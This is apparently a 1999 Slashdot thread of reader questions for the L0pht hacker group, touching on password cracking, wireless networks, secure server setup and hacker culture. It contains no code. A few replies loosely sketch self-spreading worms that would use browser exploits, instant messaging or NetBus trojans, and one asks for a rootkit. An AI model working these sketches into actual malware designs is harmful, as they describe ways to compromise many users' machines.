"How does it feel?" What a bizarre question. Well, let me give an answer. I'll answer it in as much detail as possible so you can really get a good sense about what a job offer from a second-rate IPO e-commerce outfit feels like. Pay close attention. It's best to read this twice, as it will take at least two readings for your imagination to kick in. (I say this because from the sound of the question -- asking how a job offer feels -- I get the sense that (a) you're still in college and have not had a job offer, (b) are working at a job and are a little slow, or (c) are truly a blockhead and have no idea how the real world works and that, well, a job offer doesn't feel like much -- or at least not much that is easily quantifiable.) So, this is what it feels like: It feels all tingly. It feels like when you're in the ocean and you've been swimming out away from the beach for about 20 minutes, and then suddenly you turn back toward shore, swim for another 20 minutes, and then get up on the beach and walk to the beach house for a nice, cool Pina Colada. That's about the closest I can describe it. Well, okay, not entirely true. It feels like when you've been standing on a train platform on a cold morning and then the train comes whooshing by and kicks up a tiny pebble which zings toward your face, hits your glasses, cracks the lens, and then zigs to the right and dings your nose. It feels the way your nose feels after the pebble has fallen back to the platform and you're standing there -- standing wearing your goose-down winter coat, your thick gloves, and carrying your briefcase -- and you must walk up the steps into the train vestibule with a horde of other commuters.
The ding from the pebble stings -- but only a little bit -- but you're more worried about whether or not the pebble caused your nose to bleed (you can't tell because you have gloves on) -- but you're self-conscious since people are looking at you, and you're not sure if they're looking at you because your glasses are cracked, because the side of your nose is bleeding, or because you look a little shell-shocked because you just got whipped by a pebble shot up from the steel wheels of the train. That's about the best way to describe how the job offer from a second-rate outfit feels like.

Re:Job offers (Score:1)
by eyeball on Monday December 27, @02:28PM EST (#109) http://www.spacehaven.com
Haha. Wow, that good? I wonder how it feels when the stock options kick in. :)
I'm looking for Sara Shelton from the Oregon/Washington area. Please email me if you know her.

Re:Job offers (Score:1)
by |deity| on Monday December 27, @08:49PM EST (#181)
I know this is a little off topic. I'm a student, working on a degree in computer science. I would like to work in the security field; where should I start? What kind of things should I be doing to prepare myself for a job in this field? I've been programming for about nine years in various languages.

Re:Job offers (Score:1)
by eyeball on Monday December 27, @09:13PM EST (#182) http://www.spacehaven.com
2 pieces of advice: 1) start as a network/sysadmin and prove yourself 2) don't take advice from anyone, especially mine :)
I'm looking for Sara Shelton from the Oregon/Washington area. Please email me if you know her.

Re:Job offers (Score:0)
by Anonymous Coward on Wednesday December 29, @08:02AM EST (#228)
Be a sys admin, do a security audit (hack your servers) and tell your managers that they are vulnerable, they will fear you (if they don't fire you) then tell them they should have a full time security tester (Then make that your job title).

Which do you consider more dangerous (Score:5, Interesting)
by Gleef (gleef@capital.net) on Monday December 27, @12:09PM EST (#7) about:mozilla
Which do you consider more dangerous to personal liberties on the Internet, national governments or multinational corporations, and why?
---- Open mind, insert foot.

Um (Score:1)
by Synn on Monday December 27, @12:10PM EST (#8)
How the frag do you pronounce L0pht? And what the hell does it mean? Somebody write me a perl warez filter for pete's sake. All this kewl l33t drek is driving me insane.

Re:Um (Score:1)
by GeorgeH (georgeah@nOsPaM.home.pLeAsE.com) on Monday December 27, @12:19PM EST (#25) http://slashdot.org/comments.pl?sid=GeorgeH
Ell Zero Pee Aitche Tee
L 0 P H T : PH = F (in crazy english)
L0FT : 0 = O (in crazy 1337 5p33k)
loft
1 : an upper room or floor : ATTIC
2 a : a gallery in a church or hall b : one of the upper floors of a warehouse or business building especially when not partitioned c : HAYLOFT
3 a : the backward slant of the face of a golf-club head b : the act of lofting
4 : the thickness of a fabric or insulating material (as goose down)
-- I hate spelling and grammar nazis.

Re:Um (Score:2)
by bbk (insert@pithy.email.obfuscation.here) on Monday December 27, @12:22PM EST (#29)
l0pht is pronounced "loft" - synonymous with attic. l0phters are people who dumpster dive looking for computer parts, usually in large companies' trash bins, and carry the parts back to their l0pht where they use them. I've l0phted a couple monitors and cases from my ever so friendly ECE department before... It's a great way to get an eclectic computer collection for very little!

Re:Um (Score:2)
by BradyB (bradyb@mailandnews.spam.com) on Monday December 27, @12:24PM EST (#33)
I always thought that L0pht stood for LOW PHAT as in Low fat as in high speed low drag.
Good is never good enough when you dream of being the best.

Just out of curiosity...
(Score:1)
by Ater (ater@nospam.goatse.cx) on Monday December 27, @12:10PM EST (#9) http://www.redrival.com/ater
Where did you guys come up with the name, "the l0pht?" Does the 0 in it (as opposed to an O) have some special significance?
--- Do you want to change your name to Homer Jr.? The kids can call you Ho-Ju! ---

0 is Ø. (Score:0)
by Anonymous Coward on Monday December 27, @05:42PM EST (#158)
Well - According to l0pht's logo. L0pht is actually written LØpht. Ø is scandinavian.

Re:0 is Ø. (Score:1)
by Levine (bourgon@bigfoot.com) on Monday December 27, @06:12PM EST (#162)
Most CS people write their zeros with a line through it.
Levine

Re:0 is Ø. (Score:1)
by myconid (myconid@deletethispart.sover.net) on Monday December 27, @07:43PM EST (#178) http://www.myconid.com
Unless they have ever taken a math class in their life and realise 1-1 = Slashed 0 isn't true :-)
SB. (C) 2000

Re:0 is Ø. (Score:0)
by Anonymous Coward on Tuesday December 28, @02:32AM EST (#202)
oh oh, let the pre-calculus student in high school answer that one, Ø is nullset, or is that with the slash in the opposite direction? well, as someone put it in another post, do not take anyone's advice, especially mine

Re:0 is Ø. (Score:1)
by Levine (bourgon@bigfoot.com) on Wednesday December 29, @09:26PM EST (#236)
CS people differentiate between an O and a 0 (an 'oh' and a zero) by slashing the zero. If it's wrong, so be it. It still happens.
Levine

Re:0 is Ø. (Score:1)
by generic (larry@[n0sp4m]adm3.com) on Monday January 03, @01:36PM EST (#239)
or is it theta?

Future of Security (Score:0)
by Anonymous Coward on Monday December 27, @12:10PM EST (#10)
What do you think will be the future of computer security? Encryption? I don't think it'll be enough... What we'll be doing to protect our data?

Private wireless networks (Score:3, Interesting)
by rise (jconway@ipopros.com) on Monday December 27, @12:12PM EST (#12) http://www.ipopros.com
The L0pht has been involved in independent wireless networking reasonably heavily. What do you see as the most important discoveries/protocols/designs for the next few years? Do you foresee an opportunity for the hardware hacking community to open up the airwaves in the same way Linux & OSS has opened up operating systems and tools?

L0phtCrack (Score:2)
by OnyxRaven (onyxraven@nospamhere.netscape.net) on Monday December 27, @12:13PM EST (#14) http://www.prolynx.com/onyxraven/
At work we recently purchased a copy of L0phtCrack (Guess what - it has saved many many hours of work for me especially!) - for $99? Are you guys making a killing off of this tool or what?
~Nth Dimension~

Distributed Computing (Score:3, Interesting)
by jake_the_blue_spruce on Monday December 27, @12:13PM EST (#16)
Moore's law is that computing power doubles every eighteen months. At the same time, parallel processing and distributed computation (Cosm & Distributed.net) are becoming increasingly common. This leads to an abundance of cheap computing power, enabling brute force attacks on secure systems. In light of these developments, do you see username/password pairs being replaced by anything more resistant to such brute computing force?
"There's so much left to know/ and I'm on the road to find out." -Cat Stevens

Re:Distributed Computing (Score:1)
by jake_the_blue_spruce on Monday December 27, @12:15PM EST (#18)
Shoot. Cosm is at http://cosm.mithral.com/. I thought I checked that link.
"There's so much left to know/ and I'm on the road to find out."
-Cat Stevens

Pronunciation (Score:2, Interesting)
by RAruler (cannabis at home dot com) on Monday December 27, @12:14PM EST (#17)
At one point I thought it was "low-fight" but somewheres I remember it being said as "loft" which would make more sense as L=L 0=O PH=F T=T LOFT
This post uses only 100% recycled electrons.

Re:Pronunciation (Score:1)
by norkakn on Monday December 27, @10:06PM EST (#189)
Hey, better than me... for a while i thought it was "'low fat' heavy industries" with the pun... but then i actually heard the name somewhere *gasp*
jdobbie@kmfms

Re:Pronunciation (Score:1)
by splinter (dull_boy_jack@hotmail.com) on Tuesday December 28, @01:13AM EST (#200) http://www.deimos.org
read your douglas adams, fool.

Re:Pronunciation (Score:0)
by Anonymous Coward on Tuesday December 28, @01:09PM EST (#218)
well, a rather good interview of the crew, 4th Jan 99 BBC2 (UK) had it pronounced "the loft" as the pictures proved, their "den/lair" (can't think of a better word) it is in fact a loft, in Boston. I hope this proves how, but I wonder why? Why, ya think it was Level zero Phreaking Hacking Team?

Future Products (Score:1)
by MoOsEb0y (mooseboy@vqf.com) on Monday December 27, @12:15PM EST (#19)
What products and or projects are you considering in the future? Also, what happened to the wireless networking you were planning (and made a few steps to)? I have often considered setting up something similar to this on a local scale for a few friends. But I think it'd be awesome to be able to be free of US Worst for my internet service.

advisories (Score:1)
by krog (gamache-at-mit.edu) on Monday December 27, @12:16PM EST (#21) http://web.mit.edu/gamache/www
you haven't released any security advisories lately. where do you get your nitrous? can i have some?

Re:advisories (Score:1)
by barleyguy on Monday December 27, @12:32PM EST (#39)
Nitrous is available as a product called "whip-its".
It's manufactured for making whipped cream, but is usually sold at adult bookstores. I'm not sure exactly why....
--- istream >> ostream "We all scream for ice cream!";

Re:advisories (Score:0)
by Anonymous Coward on Monday December 27, @05:04PM EST (#152)
http://www.onepercent.com/whipit.html That's where you can get your nitrous :) --huge coward

Things to come... (Score:0)
by Anonymous Coward on Monday December 27, @12:18PM EST (#23)
Do you have a guesstimate as to when Operating Systems and protocols will make Information Security a non issue (from an attack and penetration perspective)? I have discussed this with my colleagues quite a bit and none of us can really say. This is not bait for Microsoft jokes, either. Developers may eventually wisen up, the day that I hang my A/P hat and retire to a desk job because of this evolution is inevitable, but thankfully not in sight. I would appreciate some comments on this matter... -jcw

Coagulation (Score:1)
by Raffy (rafe.digitaldiscipline@com) on Monday December 27, @12:19PM EST (#24) http://www.digitaldiscipline.com
L0pht- As with any of the well-known infosec groups (you, cDc, &c), it's always a far-flung collective of folks who coalesce and make things happen. How did you meet and decide, "hey, we have common goals and interests, let's do this as a team"?
Rafe V^^^^V Opinions expressed by the author may not actually exist in the wild.

Re:Coagulation (Score:1)
by Synic (synic@linuxfreak.com) on Monday December 27, @03:13PM EST (#129) http://www.lanparty.com
The l0pht and cDc people live in the same city. The l0pht people live in the same building. :) (as far as I remember) This info is on their web page. www.l0pht.org i think.

nope. (Score:0)
by Anonymous Coward on Monday December 27, @05:04PM EST (#151)
some cDc members are in texas, some are in california. One seems to spend a fair bit of time in Canada, although I don't know if he lives there.
The l0pht members (including the mudge, who is also a cDc member) live in boston.

The net: strip mall or unlimited human potential? (Score:5, Insightful)
by garagekubrick (domu13@yahoodotcom) on Monday December 27, @12:19PM EST (#26) http://lifs.org.uk
The halcyon days of the net are gone. With ubiquity - the underground vanishes. Is it well on its way, with people like the CEO of Amazon being worshipped by the mainstream press, to becoming an enormous cyber strip mall, marketing tool, PR exercise in control of perception... Or is there still an underground? Does it still have a potential to be the one true medium with liberation? Will governments and corporations end up controlling it? Cause they are winning small, important victories relentlessly...
"I am not a gun"

,,, (Score:2, Interesting)
by Signail11 on Monday December 27, @12:20PM EST (#27)
Considering the availability of easy to use, secure, persistent, pseudoanonymous nyms (http://www.freedom.com) and the increasing role that electronic commerce plays in our economy, what privacy and security concerns do you anticipate moving to the forefront of attention as this rapidly changing technology evolves?

Actually it's http://www.freedom.net (Score:1)
by LiNT_ on Monday December 27, @01:35PM EST (#77)
See above

IPSEC key debate (Score:1)
by Ruzty on Monday December 27, @12:21PM EST (#28) http://www.moosehead.com/
What is your take on the quashing of the use of photuris, for IPSEC keyserver use over the open to attack isakmp, by the IETF?
"Try to spend the next 30 seconds not thinking about a blue eyed polar bear." -Feodor Dostoevsky

A quickish question (Score:3, Interesting)
by jd on Monday December 27, @12:22PM EST (#30)
The Internet is fragmenting (eg: IPv4 vs. IPv6, Internet 2) and those parts that do have any awareness of security are now beginning to take it seriously (eg: IPSec, SSH). Many other parts are brain-dead, insecure and incoherent.
How do you see things evolving, from this unholy mess?

A question about L0pht constituents: (Score:3, Interesting)
by NateTG on Monday December 27, @12:23PM EST (#31)
What are the non-computer hobbies of the l0pht crew? I suppose that this is a sort of "celebrity interview" question, but I'm curious.

Name Dropping Asswipes (Score:2, Interesting)
by Anonymous Coward on Monday December 27, @12:24PM EST (#32)
I meet a lot of "white hat" security types in my job. Every so often, one of these guys goes into name dropping mode and starts talking about how chummy he is with Mudge. Once I had one of them tell me how he had contacts with the "low fat" guys (although he hadn't heard it pronounced as "loft"). What is it like to have your name(s) dropped by potentially thousands of really clueless people who you might never even meet?

Somebody else would do this, so I'll do it first (Score:0)
by Anonymous Coward on Monday December 27, @12:26PM EST (#34)
What do you propose as a solution to the whole Q1 OSS cheating debacle?

Human interest stuff (Score:1)
by Errant Knyght (knyght@excite.com) on Monday December 27, @12:27PM EST (#35)
Now I know that Mudge has a painting (can't remember who by) hanging around, and I was wondering what artist everyone at L0pht enjoys as well as composers (if any there are into classical music).

Defensive Design Methodologies (Score:4, Insightful)
by FuriousJester (peterman at the temple of funk) on Monday December 27, @12:29PM EST (#36)
I read something to the gist of this recently: "The difficulty with computer security is that programmers write code to allow a course of action, not to prevent another. In order for computer security to become a reality, the design methodology must be changed." Any programmer worth their check does program defensively. Certain languages support the writing of "safe code" more easily than others. It requires less fore-thought to program defensively in Java than it does in C.
The results, however, will not be as fine tuned. Any methodology for designing and producing safe code must take this, the experience of those implementing it, the environments the product could be used in, into account. L0pht has compromised many designs. Have you seen any design/impl (hardware or software) methodologies that yield more secure results than others? Could you give reference to them? In my experience, it has always been a matter of refinement. Security is relative.
Nuclear weapons can destroy the world, if used properly. -David Byrne

Windows API (Score:3, Interesting)
by IRNI (irni@irni.net) on Monday December 27, @12:31PM EST (#37) http://www.irni.net
If the windows API was opened because of the DOJ trial, what would you do?
A) Exploit every weakness from here to kingdom come, thereby propelling linux to the forefront.
B) fix everything and tell microsoft so they can make the changes show up in a new release
C) Do A) and grin real big and giggle lots
D) Other | Please Specify ___________________

Re:Windows API - Flawed Logic (Score:1)
by Charlatan (jmutter at ds dot net) on Monday December 27, @04:16PM EST (#143) http://www.freebsd.org/
If the windows API was opened because of the DOJ trial, what would you do? A) Exploit every weakness from here to kingdom come, thereby propelling linux to the forefront.
First, I don't understand how exposing specific Windows vulnerabilities would propel 'linux to the forefront'. Your statement doesn't support your conclusion. Anyhow... (and more on topic with your original post) if you pay attention, every exploit is closely followed by a fix. Exposing weaknesses in Windows would really just help, in the long run, to make it a more viable alternative to UNIX.

Re:Windows API (Score:0)
by Anonymous Coward on Monday December 27, @06:40PM EST (#170)
First I agree with the previous post that exposing weaknesses in windows doesn't have a strong connection to "propelling linux to the forefront".
Also if anyone is seeking to find flaws in windows they probably wouldn't stoop that much lower if they simply decompiled it themselves illegally.

Question: (Score:1)
by sboss (scott at sboss dot net) on Monday December 27, @12:31PM EST (#38)
Do you think there will be any security in the internet of the future? There seems to be more and more security holes (or at least we are finding more). Plus does encryption or digitally signing data help or hinder the net? Thanks Scott
Scott C{E,F,O,T}O sboss dot net email: scott@sboss.net

Regret / Useful Software / Orwellian CPUs (Score:2, Interesting)
by MattW (ma++@ender.com) on Monday December 27, @12:34PM EST (#40)
I have a couple questions. Choose whatever you like.
* The silicon valley is froth with IPOs. A huge opportunity exists even in Boston, if you were attached to the city. Do you regret not putting more into a commercial enterprise that could have netted you the millions some people are getting? If so, would you trade your fame in this community for it if you could?
* L0pht spends an enormous amount of time hacking on other peoples' equipment, cracking and analyzing other peoples' software. Without meaning to denigrate such useful activities, do you ever want to stop it for a while and dedicate yourself to the creation of something innovative and positive?
* Somewhere in the future, drowning in gigahertz, manufacturers turn to adding security to their CPUs. CPUs have decryption modules which stop the CPU from running any code not specifically signed and encrypted for your CPU. Your machine (or cpu) would come with a disk or cdrom with a public key you'd provide to vendors (probably on a web page) that would be used to "complete" a build of software that was sold to you, and lock it onto your CPU only. Every piece of software will have a known destination and a known source. Piracy will be a thousand times harder.
Viruses will be wiped out by applying this technology to documents and software alike. Is this the future?
* I see the patent situation forcing software to inevitably go one way or the other: it will either be written only by corporations with tons of money and patents, and be commercial (and by judgement-proof pauper-programmers who have nothing to sue away from them), or the USPTO will suffer through a massive regulation change, and thousands of software/algorithm/business-model patents will be swept away, along with more easy way to review a given patent's "nonobvious"-ness. Where do you think this tragedy is headed?

What does L0pht mean? Maybe an answer (Score:1)
by BradyB (bradyb@mailandnews.spam.com) on Monday December 27, @12:35PM EST (#41)
Well I never really put much thought in to it, but here goes. L0pht Heavy Industries. Perhaps it means Low Phat as in Low Fat , Heavily Used as in high speed low drag industries.
Good is never good enough when you dream of being the best.

evolution of the network (Score:1)
by kootch on Monday December 27, @12:35PM EST (#42) http://students.hamilton.edu/1999/dkutcher
with the local networks expanding from one solitary computer, to 20 computers connected in a room, to wireless devices also now able to connect to large databases and networks, how do you see the security industry (is it considered an industry) responding to these changes and do you foresee any interesting problems arising?

How's the wireless 'net project going? (Score:3, Interesting)
by Anonymous Coward on Monday December 27, @12:35PM EST (#43)
I was digging around the l0pht web site one day and read up on the wireless project you guys were doing trying to make use some old UHF equipment and seeing how far you could spread a free wireless network. So what's the current status of that project?

pls answer the q above (Score:0)
by Anonymous Coward on Monday December 27, @02:18PM EST (#101)
Just recently on slashdot there was talk of large wireless networks using wavelan. I'm especially interested in hearing about the status of guerilla.net. I'm sure answering the question i'm replying to would further the project and get more people involved. thanks

Re:How's the wireless 'net project going? (Score:0)
by Anonymous Coward on Monday December 27, @06:25PM EST (#163)
Packet radio systems have existed for years, invented by Radio Amateurs, there is nothing new here. Packet radio networks exist on HF, VHF and UHF. what's new? Usually the speed of such a network does not exceed 9600baud (kbits/s), especially when using HF, when you transmit your data from one point to another on the globe.

Internet thru packet radio... NOT! (Score:1)
by Inferno (inferno[at]teleport[dot]com) on Tuesday December 28, @03:59AM EST (#204)
The amateur radio packet network is governed by the FCC just like any other amateur radio communications mode. The regulations can be difficult to get around, such as the rule that you MUST have an amateur radio license to transmit anything on an amateur radio frequency. This would put a kink in using IRC for one. You would only be able to converse with valid amateurs, which would be impossible to guarantee. I looked into setting up a wireless amateur radio packet network at school, as I admin a svr that is currently connected to the Internet AND the packet radio network. I couldn't legally use IRC thru the radio link because the folks I would chat with do not have FCC amateur radio licenses. 'Bout the only thing this would come in handy for would be remote system administration, but then you would have to look at the fact that packet radio is an OPEN mode of communication. Anyone with a TNC and radio receiver would be able to monitor what was going on.
And forget about using SSH or some similar mode of secure shell access -- the FCC forbids the use of encryption. :(

Question (Score:1)
by Necroleptic (auto33629@hushmail.com) on Monday December 27, @12:39PM EST (#45)
(User Info) http://users.bergen.org/~johsan

What are your opinions on "script kiddies" and your propagation of these people? Don't you believe that people who would want to be hackers should learn through experience, much like yourselves?

Security Lint (Score:3, Interesting)
by Omniscient Ferret (jyoung@cs-sun1.truman.edu) on Monday December 27, @12:39PM EST (#46)
(User Info) http://cs-sun1.truman.edu/~jyoung/index.htm

For assurance, before installing software on a secure-as-plausible machine, I would love to have an automated for security problems, such as buffer overflows. So, how is the development of SLINT progressing? Are you still planning to release it?

Re: Security Lint (Score:1)
by Omniscient Ferret (jyoung@cs-sun1.truman.edu) on Monday December 27, @01:01PM EST (#56)
(User Info) http://cs-sun1.truman.edu/~jyoung/index.htm

Er, that should be "love to have automated scanner".

Welcome, our door is open (Score:2, Interesting)
by lildogie on Monday December 27, @12:40PM EST (#47)
(User Info)

What do you think about the wisdom of linking a planetary network of desktop computers to a radio telescope, hoping to go online with any extra-terrestrial who cares to open our collective port?

Little Dogie

Internet Worm II (Score:4, Interesting)
by tilly on Monday December 27, @12:43PM EST (#48)
(User Info)

Several months ago I began predicting that someday someone would find a buffer overflow in the various Windows TCP-IP stacks and use it to write a worm that would bring down the Microsoft part of the Internet and cause so much traffic as to effectively shut down everything else.
I further predict that until an event of this magnitude happens, the general public will not really learn the basic lessons about security that the *nix world was forced to learn from the first worm. What are your thoughts on this prediction? (Timeline, reasonableness, etc.)

Regards, Ben

I miss the old InfoWorld forums. :-(

Re:Internet Worm II (Score:1)
by jesser on Monday December 27, @04:20PM EST (#144)
(User Info) http://www.palosverdes.com/jesse/

windows 95 had at least one buffer overflow exploit.. one had to do with putting fragmented things together. was this hole exploitable for running arbitrary code or only for crashing the box? if the former, why wasn't there a worm? also.. as an idea for a worm.. how about a worm that opens up port 80 with enough code to exploit known security holes in various versions of msie and netscape plus some silly stuff to make it look innocent, and then IMs everyone (msnim, aim, icq, yahoo, etc) who's online and tells them to "look at your website"? it could also affect frontpage uploads...

-- Warning: this sig attracts all other sigs with a force proportional to funniness and inversely proportional to distance squared.

Re:Internet Worm II (Score:0)
by Anonymous Coward on Monday December 27, @06:31PM EST (#164)

1. Think of this, Cisco/Bay and other routers running their own stacks, which have probably not been evaluated externally. what if one of them contains an overflow? not even the stack, every router has a few ports open, the code behind them could have problems as well.

2. There is this nifty commercial stack (I forgot the name) which is used in HPUX 11.x, and quite a few embedded and proprietary systems. who knows if it's been evaluated.
even if a code has been evaluated by people who do know their stuff, after all, these people are human, so, until such a stack doesn't get evaluated by 1million programmers across the planet, for at least a year, it couldn't be considered really safe, even then, see the latest Linux 2.2.12 and below 'blind spoofing' thing.

Re:Internet Worm II (Score:2)
by sinnergy (froggy@eecs.cwru.edu) on Tuesday December 28, @07:36AM EST (#207)
(User Info) http://froggy.raex.com/

You make an interesting point. The problem is, though, that many Unix shops (the small to medium sized ones at least) don't know what the lessons were from the first Worm. I'm only 23 and I learned about it through lore more than anything else. For everyone's sake, I hope you're not right, but I do believe that a good dose of prevention and education would be in order for most of us Sysadmins. Convincing management of this necessity, though, is almost impossible. With focus more on the here and now as opposed to keeping an eye out for potential problems, it's hard to keep abreast of security technologies

- CWRUton for Life - (sad but true!)

Re:Internet Worm II (netbus) (Score:0)
by Anonymous Coward on Wednesday December 29, @11:47AM EST (#232)

Well, as 1% or 10% (or ??%) are infected by netbus installations, a worm could simply propagate from one netbus PC to the next. Would be the first worm using a trojan to propagate :-)

George

Security and Open Source (Score:0)
by Anonymous Coward on Monday December 27, @12:44PM EST (#49)

Do you believe that it is possible to provide a secure computing model in an open source environment? If so, how?

Proper NT rootkit. (Score:3, Interesting)
by Zurk (zurk@SPAMSUCKSgeocities.com) on Monday December 27, @12:51PM EST (#50)
(User Info)

Hi guys, Any plans to write a proper Win2K/NT rootkit (the kind that was published on Phrack a while back - that replaces or adds to the actual calls in the win32 ring 0 system with its own) soon ?

Re:Proper NT rootkit.
(Score:0) by Anonymous Coward on Monday December 27, @06:31PM EST (#165) You write one if you need it so badly, or goto www.rootkit.com, where kids like you can download such stuff. Re:Proper NT rootkit. (Score:0) by Anonymous Coward on Tuesday December 28, @03:50PM EST (#219) you cant get a ring 0 rootkit there or anywhere else dummy. Simple question (Score:1) by Ricochet (ncherry@dmc.uucp) on Monday December 27, @12:54PM EST (#51) (User Info) http://members.home.net/ncherry/ (First the silly question) Prove your existence :-) (Now the real question) How do we get back control of our information? Re:Simple question (Score:0) by Anonymous Coward on Monday December 27, @06:33PM EST (#166) 1. already proven, see them at DefCon, Blackhat and other places. 2. We never will, once it's out there, it's on the loose, like a wild animal. Security? (Score:1) by Raffy (rafe.digitaldiscipline@com) on Monday December 27, @12:55PM EST (#52) (User Info) http://www.digitaldiscipline.com Assume you own a server to run the following protocols: HTTP, POP/POP3, SMTP, NNTP, telnet, FTP. Can such a machine be secure under -any- OS? If this was sitting in your basement, what would you do with it (after loading Q3A/UT and distributed.net's latest client ;-) to make sure the script kiddies didn't f*ck with you? Rafe V^^^^V Opinions expressed by the author may not actually exist in the wild. Re:Security? (Score:2) by Chandon Seldon (acorn@gis.net) on Monday December 27, @03:23PM EST (#131) (User Info) http://www.calug.net/ Assume you own a server to run the following protocols: HTTP, POP/POP3, SMTP, NNTP, telnet, FTP. Can such a machine be secure under -any- OS? If this was sitting in your basement, what would you do with it (after loading Q3A/UT and distributed.net's latest client ;-) to make sure the script kiddies didn't f*ck with you? How I'd go about giving it maximum security. 
(Disclaimer: I've never actually set up a server running more than HTTP + FTP + POP3)

1. Partition the machine into the following partitions:
   / (ro)
   /home/httpd (ro if possible)
   /home/mail (rw)
   /home/news (rw)
   /home/ftpd (ro if possible)
2. Install the most recent version of OpenBSD
3. Install any security fixes
4. Remove distributed.net's latest client and Q3A
5. Create the following new users: httpd, pop3d, nntpd, ftpd, telnet, unperson, admin
6. Set the permissions for all the files on the machine as strict as possible.
7. Setup a program to forward all requests on ports below 1024 to ports 10000 through 11024.
8. Set each server as its own user, and make sure that one user can't affect the files of another in any way.
9. Set up each server on standard_port+10000, and have them each store their files in their own partition (mounted under /home)
10. Use the simplest, most secure server for each task. Yes, this means you can't use apache.
11. Don't allow telnet logins as anyone but admin.
12. Set up the admin account with the minimum set of privileges necessary to administer the machine.
13. Go "chown root /bin/chmod; chmod og-rwx /bin/chmod"
14. "chmod a-x" any programs that aren't absolutely necessary to the machine working, like 'su', 'chown', 'fortune', etc.
15. Change your root and admin passwords weekly.
16. Do anything that you should do that I missed.

This should, at best, prevent anyone from messing with the machine at all. At worst, if someone does get in, they shouldn't be able to do anything - anything at all.

-------- The act of censorship is always worse than whatever is being censored. -Chandon Seldon

Re:Security? (Score:1)
by Spamizbad on Tuesday December 28, @02:10AM EST (#201)
(User Info)

How about also getting rid of telnet and using Openssh (included with OpenBSD, no?). Mmm... 128bit encryption.

Re:Security?
(Score:0) by Anonymous Coward on Monday December 27, @06:34PM EST (#167) Many things can be done, this is not the place to discuss them, why don't you come up with something new? meanwhile, see the StackGuard/PointerGuard/openwall projects. Slint (Score:2, Interesting) by Emphyrio (emphyrio@rvdm.op.het.net) on Monday December 27, @12:58PM EST (#53) (User Info) http://rvdm.op.het.net According to your site, you have developed a quite powerful source code security analysis tool. A while ago, this tool was not distributable, and closed source. Do you plan on releasing Slint and/or other currently closed source L0pht tools in an open source license, or in some other freely distributable binary form ? Questions (Score:1, Interesting) by Anonymous Coward on Monday December 27, @01:00PM EST (#55) I've been checking out the 'L0pht' ever since the days when mudge posted the page up asking how many boxes everyone had up, but anyways... Is there any work still being done on the 'guerilla net' project? The page hasn't been updated in ages. Did you guys ever manage to locate the TX ready pin on the WaveLAN cards to switch the amplifier on? What happened to the user pages on www.l0pht.com? What are your main development platforms? ...And of course, what's the best piece of equipment you've dug out of the garbage so far? software liability (Score:0) by Anonymous Coward on Monday December 27, @01:08PM EST (#57) hi guys. when you testified before congress, one of you (I believe it was Weld Pond) said that software manufacturers need a financial incentive to ship secure software. I believe that you went on to say that they should be held partially liable for damages caused by bugs in their software. How do you think that legislation like that would affect the open source movement? 
Differences in interest (Score:1) by BlueCalx- (nickd@nickd.org) on Monday December 27, @01:11PM EST (#58) (User Info) http://nickd.org Sometimes, corporations are ignorant of your advisories, as they feel the general hacking community is only destructive and has little to offer. It also seems obvious in ABCNews' report that people have an inherent fear of the hacking/cracking community in general. The intent of some groups (cDc comes to mind) is different from others (gH), and as a result it becomes difficult to create an accurate definition of what hacking/cracking really is. My question is this: do you feel the negative publicity and stereotypes of hackers and crackers rubs off on l0pht to some extent? -- BlueCalx | http://nickd.org/ IPv6 (Score:0) by Anonymous Coward on Monday December 27, @01:12PM EST (#59) Hi. Lots of companies are shipping "VPN" solutions that are simply IPv6 boxes. Do you feel that IPv6 is adequate for this purpose? Will IPv6 really prevent the types of attacks we've seen with IPv4? Please reply to this! (Re:IPv6) (Score:1) by dibos (krooger@debian.BLOCKSPAM.org) on Monday December 27, @06:41PM EST (#172) (User Info) http://master.debian.org/~krooger Good question. I have heard that IPv6 is as insecure as IPv4; I'd like to know more about that. A Question of Principle (Score:2, Interesting) by sudog on Monday December 27, @01:12PM EST (#60) (User Info) I was not impressed to see L0pht embrace any form of commercial philosophy. While it is true I live in a fairly isolated section of the world, I and the community I live within have the general impression that you are no longer available to the public. It appears as though you have sequestered yourselves away in your building(s) and sent Mudge out to maintain good PR. What I mean is, aside from the odd security release and product update, you guys seem to have disappeared from the face of the earth. What are you up to? 
Are you still truly pursuing the tenet that is listed prominently on your BBS? "Freedom, freedom, blah" -lhi, psalm blah verse blah? Do you see yourselves as this inaccessible except to people willing to fork over large dollars, or am I just living on the moon?

Re:A Question of Principle (Score:1)
by God I hate mornings (dj_batt at worldnet dot att dot net) on Monday December 27, @01:37PM EST (#80)
(User Info)

I don't think that they're pursuing the almighty dollar. I have contacted them several times with hopes of getting them to do some security work for various clients of mine. All had the potential for very nice paychecks at the end. They refused the work, very politely tho. SO I think you might be a bit off base. But I could be wrong.

GIHM -The light at the end of the tunnel is only the oncoming train.

Capabilities in Linux (Score:1)
by Nemesys on Monday December 27, @01:13PM EST (#61)
(User Info)

Hi - this is a specific question. Do you think we'll see capabilities begin to replace root in Linux? What will that world be like? When will it happen?

Re:Capabilities in Linux (Score:0)
by Anonymous Coward on Monday December 27, @06:37PM EST (#168)

It will take a long *long* time before such a thing fully merges into the Linux tree. Meanwhile look at www.eros-os.org and pray for them to complete it. If you're really interested, search for documentation on Boeing SNS and Honeywell SCOMP.

OpenBSD (Score:0)
by Anonymous Coward on Monday December 27, @01:14PM EST (#62)

How secure do you feel linux is? Please compare or contrast this with OpenBSD.

Re:OpenBSD (Score:0)
by Anonymous Coward on Monday December 27, @06:39PM EST (#169)

A lot less, see what the OpenBSD kernel has to offer in terms of security. The usermode code has been also reviewed and made stronger. much less code, more eyes watching it, the result, better security.

Reply to this letter.
(Score:5, Funny) by An0nymousC0ward (president@whitehouse.gov) on Monday December 27, @01:14PM EST (#63) (User Info) http://www.slashdot.org This letter was recently published in the columbus dispatch (Ohio's greatest home newspaper....yea right). What would your response be to this person? Letter to the editor: Opening windows could let bad guys do a lot of damage Saturday, December 25, 1999 I was amazed to see that the Clinton administration, in its initial victory over Microsoft, wants the source code to Windows to be made public. I'm sure it will follow up with a demand that all banks publish the combinations to their safes and freely distribute keys to both their front and back doors. Perhaps they will make banks install a large button so visitors can disable all alarms. Making the world safe for bank robbers would be a lot better than making Windows' source code public. The year 2000 problem is nothing compared to what a hacker could do with the code to Windows. The anti-virus software today depends on two primary tests to find a virus: the Cyclic Redundancy Checksum and file size. A virus attaches itself to a program and runs when the program runs. Rather than get into a complex technical discussion, let us just say every computer file has a fingerprint. If a virus is attached, the file's fingerprint changes. An anti-virus program just looks for the fingerprints left by the virus. However, if one has the source code to Windows, a file with a virus can be made with the same fingerprint as a file without the virus. Even 